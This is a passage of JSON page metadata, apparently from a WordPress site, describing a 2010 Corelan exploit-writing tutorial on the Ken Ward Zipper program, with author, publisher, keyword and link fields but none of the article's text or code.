Research","article_publisher":"https:\/\/www.facebook.com\/corelanconsulting","article_published_time":"2010-03-27T12:28:49+00:00","og_image":[{"url":"http:\/\/www.digiprove.com\/images\/dp_seal_trans_16x16.png","type":"","width":"","height":""}],"author":"corelanc0d3r","twitter_card":"summary_large_image","twitter_creator":"@corelanc0d3r","twitter_site":"@corelanc0d3r","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"TechArticle","@id":"https:\/\/www.corelan.be\/index.php\/2010\/03\/27\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\/#article","isPartOf":{"@id":"https:\/\/www.corelan.be\/index.php\/2010\/03\/27\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\/"},"author":{"name":"corelanc0d3r","@id":"https:\/\/www.corelan.be\/#\/schema\/person\/3be5542b9b0a0787893db83a5ad68e8f"},"headline":"Exploiting Ken Ward Zipper : Taking advantage of payload conversion","datePublished":"2010-03-27T12:28:49+00:00","mainEntityOfPage":{"@id":"https:\/\/www.corelan.be\/index.php\/2010\/03\/27\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\/"},"wordCount":2182,"publisher":{"@id":"https:\/\/www.corelan.be\/#organization"},"image":{"@id":"https:\/\/www.corelan.be\/index.php\/2010\/03\/27\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\/#primaryimage"},"thumbnailUrl":"http:\/\/www.digiprove.com\/images\/dp_seal_trans_16x16.png","keywords":["encoder decoder","egghunter","alphanumeric","seh","shellcode"],"articleSection":["Exploit Writing Tutorials","Exploits","Security"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.corelan.be\/index.php\/2010\/03\/27\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\/","url":"https:\/\/www.corelan.be\/index.php\/2010\/03\/27\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\/","name":"Exploiting Ken Ward Zipper : Taking advantage of payload conversion - Corelan | Exploit Development &amp; Vulnerability Research","isPartOf":{"@id":"https:\/\/www.corelan.be\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.corelan.be\/index.php\/2010\/03\/27\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\/#primaryimage"},"image":{"@id":"https:\/\/www.corelan.be\/index.php\/2010\/03\/27\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\/#primaryimage"},"thumbnailUrl":"http:\/\/www.digiprove.com\/images\/dp_seal_trans_16x16.png","datePublished":"2010-03-27T12:28:49+00:00","breadcrumb":{"@id":"https:\/\/www.corelan.be\/index.php\/2010\/03\/27\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.corelan.be\/index.php\/2010\/03\/27\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.corelan.be\/index.php\/2010\/03\/27\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\/#primaryimage","url":"http:\/\/www.digiprove.com\/images\/dp_seal_trans_16x16.png","contentUrl":"http:\/\/www.digiprove.com\/images\/dp_seal_trans_16x16.png"},{"@type":"BreadcrumbList","@id":"https:\/\/www.corelan.be\/index.php\/2010\/03\/27\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.corelan.be\/"},{"@type":"ListItem","position":2,"name":"Exploiting Ken Ward Zipper : Taking advantage of payload conversion"}]},{"@type":"WebSite","@id":"https:\/\/www.corelan.be\/#website","url":"https:\/\/www.corelan.be\/","name":"Corelan CyberSecurity Research","description":"Corelan publishes in-depth tutorials on exploit development, Windows exploitation, vulnerability research, heap internals, reverse engineering and security tooling used by professionals worldwide.","publisher":{"@id":"https:\/\/www.corelan.be\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.corelan.be\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.corelan.be\/#organization","name":"Corelan CyberSecurity Research","url":"https:\/\/www.corelan.be\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.corelan.be\/#\/schema\/logo\/image\/","url":"https:\/\/www.corelan.be\/wp-content\/uploads\/2026\/03\/corelanlogo2_small-20.png","contentUrl":"https:\/\/www.corelan.be\/wp-content\/uploads\/2026\/03\/corelanlogo2_small-20.png","width":200,"height":200,"caption":"Corelan CyberSecurity Research"},"image":{"@id":"https:\/\/www.corelan.be\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/corelanconsulting","https:\/\/x.com\/corelanc0d3r","https:\/\/x.com\/corelanconsulting","https:\/\/instagram.com\/corelanconsult"]},{"@type":"Person","@id":"https:\/\/www.corelan.be\/#\/schema\/person\/3be5542b9b0a0787893db83a5ad68e8f","name":"corelanc0d3r","pronouns":"he\/him","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x","url":"https:\/\/secure.gravatar.com\/avatar\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x","caption":"corelanc0d3r"},"description":"Peter Van Eeckhoutte is the founder of Corelan and a globally recognized expert in exploit development and vulnerability research. With over two decades in IT security, he built Corelan into a respected platform for deep technical research, hands-on training, and knowledge sharing. Known for his influential exploit development tutorials, tools, and real-world training, Peter combines a strong research mindset with a passion for education\u2014helping security professionals understand not just how exploits work, but why.","sameAs":["https:\/\/www.corelan-training.com","https:\/\/instagram.com\/corelanc0d3r","https:\/\/www.linkedin.com\/in\/petervaneeckhoutte\/","https:\/\/x.com\/corelanc0d3r"],"url":"https:\/\/www.corelan.be\/index.php\/author\/admin0\/"}]}},"views":9939,"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/posts\/3530","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/comments?post=3530"}],"version-history":[{"count":0,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/posts\/3530\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/media?parent=3530"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/categories?post=3530"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/tags?post=3530"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}